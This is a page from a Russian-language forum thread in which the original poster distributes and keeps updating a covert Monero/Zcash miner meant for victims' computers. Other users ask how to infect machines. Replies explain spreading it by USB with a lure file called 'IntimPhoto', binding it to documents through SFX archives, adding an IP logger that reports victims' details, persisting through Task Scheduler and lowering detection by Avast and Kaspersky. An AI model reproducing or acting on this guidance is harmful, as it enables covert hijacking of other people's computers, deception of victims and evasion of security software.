Bitcoin Forum
June 22, 2024, 02:53:35 AM *
News: Voting for pizza day contest
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 [6] 7 8 9 10 11 »  All
  Print  
Author Topic: Бесплатный скрытый майнер Monero+Zcash  (Read 3349 times)
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 15, 2018, 07:54:43 AM
 #101

Ещё забыл сказать, в конце выходит ошибка, что типо он не может установиться в appdat'у, возможно дело в папке, нужно как то исправить
likewalk
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 15, 2018, 11:00:54 AM
Last edit: February 15, 2018, 11:50:11 AM by likewalk
 #102


Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?

Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную?
Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически?
Или антивири сейчас автоматичски режут автозапуск exe  с вирусом или без?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 15, 2018, 03:29:47 PM
 #103

Ещё забыл сказать, в конце выходит ошибка, что типо он не может установиться в appdat'у, возможно дело в папке, нужно как то исправить

А что за винда? А если запустить от имени администратора?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 15, 2018, 03:31:23 PM
 #104


Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?

Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную?
Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически?
Или антивири сейчас автоматичски режут автозапуск exe  с вирусом или без?

Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки.
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 15, 2018, 04:29:41 PM
 #105

Ещё забыл сказать, в конце выходит ошибка, что типо он не может установиться в appdat'у, возможно дело в папке, нужно как то исправить



Но это старая предпоследняя версия если что, но мне кажется и с новой будут те же проблемы

А что за винда? А если запустить от имени администратора?

Винда 10, суть в том, я с майнером испытываю дикие проблемы, при его установке, где то при его установке просит пароль, где то просто не даёт доступа, я смог заразить только два компьютера и то, те с прокси, в итоге он мне ничего не майнит, я вот не могу понять, с чем это связано.


Я пробовал по всякому, я и антивирус отключал и от сети отключал и от имени администратора запускал, ни в какую.

До этого тоже накатил на один комп, в итоге он часок помайнил там копейки и шары просто пропали, мне кажется, если бы пальнул антивирус, он бы сделал это все гораздо раньше, ибо при установке траблов не было.
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 15, 2018, 04:59:37 PM
 #106

Винда 10, суть в том, я с майнером испытываю дикие проблемы, при его установке, где то при его установке просит пароль, где то просто не даёт доступа, я смог заразить только два компьютера и то, те с прокси, в итоге он мне ничего не майнит, я вот не могу понять, с чем это связано.

Я пробовал по всякому, я и антивирус отключал и от сети отключал и от имени администратора запускал, ни в какую.

До этого тоже накатил на один комп, в итоге он часок помайнил там копейки и шары просто пропали, мне кажется, если бы пальнул антивирус, он бы сделал это все гораздо раньше, ибо при установке траблов не было.

На вин 10 лицензия могут возникать проблемы. С паролем не должно быть никаких проблем, если всё делаешь по инструкции.
На удалённый комп поставил? может просто выключили его или спалили и удалили.
likewalk
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 15, 2018, 05:09:24 PM
 #107


Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?

Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную?
Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически?
Или антивири сейчас автоматичски режут автозапуск exe  с вирусом или без?

Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки.

Может тогда кто подкинет ссылку как запихать в контейнер с файлом doc например, чтобы пользователь открыл мой файл?
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 15, 2018, 05:12:59 PM
 #108


Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?

Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную?
Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически?
Или антивири сейчас автоматичски режут автозапуск exe  с вирусом или без?

Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки.

Может тогда кто подкинет ссылку как запихать в контейнер с файлом doc например, чтобы пользователь открыл мой файл?

выделяешь 2 файла добавить в архив, там дальше создаешь непрерывный архив, заблокированный и SFX архив, сжимаешь максимально,
потом изучай параметры SFX, там как раз то, что тебе нужно, что открыть первым, скрыть или нет и тд.
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 16, 2018, 10:58:10 AM
 #109

Сборка обновлена. Снижен детект
Были проблемы с minergate, теперь всё корректно.
Добавлен iplogger(пишим его в iplog.cnf, работает только с http!, отстукивается только при установке, также сможете увидеть видеокарту в строке "Идентификатор устройства:")
Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
likewalk
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 16, 2018, 12:37:37 PM
 #110

ОП, ты итак много работы сделал конечно, но не мог бы подсказать по шагам, как с логером управится?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 16, 2018, 06:36:51 PM
 #111

ОП, ты итак много работы сделал конечно, но не мог бы подсказать по шагам, как с логером управится?

Создай логгер тут https://iplogger.org/
Только укажи http при создании, а не https
Там получишь ссылку, вставь её в iplog.cnf
GVG
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 17, 2018, 11:36:26 AM
 #112

не работает. при запуске файла Start пишет

ErrorОшибка при открытии архива. Возможные причины:
- требуется запуск от имени администратора.
- антивирус блокирует файловую систему
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 17, 2018, 11:59:01 AM
 #113

не работает. при запуске файла Start пишет

ErrorОшибка при открытии архива. Возможные причины:
- требуется запуск от имени администратора.
- антивирус блокирует файловую систему

Всё правильно. Если не нужно пользователю ничего выводить, то берите вторую версию, без окна.
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 18, 2018, 06:10:07 PM
 #114

бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 19, 2018, 02:59:53 AM
 #115

бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 19, 2018, 06:11:47 AM
Last edit: February 20, 2018, 08:26:18 AM by fredsnikos
 #116

Сборка обновлена. Снижен детект
Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 19, 2018, 07:17:57 PM
 #117

бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 20, 2018, 03:14:41 AM
 #118

бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится

Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами.
Chattyspark
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 20, 2018, 07:32:54 AM
 #119

бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится

Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами.


Я говорю, его, когда его ставишь, он прописывается в планировщик, так же я заметил, что его Аваст вообще не палит
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
February 22, 2018, 04:12:15 PM
 #120

Сборка обновлена. Снижен детект.
Пришлось убрать iplogger из-за которого срабатывал эвристический анализ каспера

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
Pages: « 1 2 3 4 5 [6] 7 8 9 10 11 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!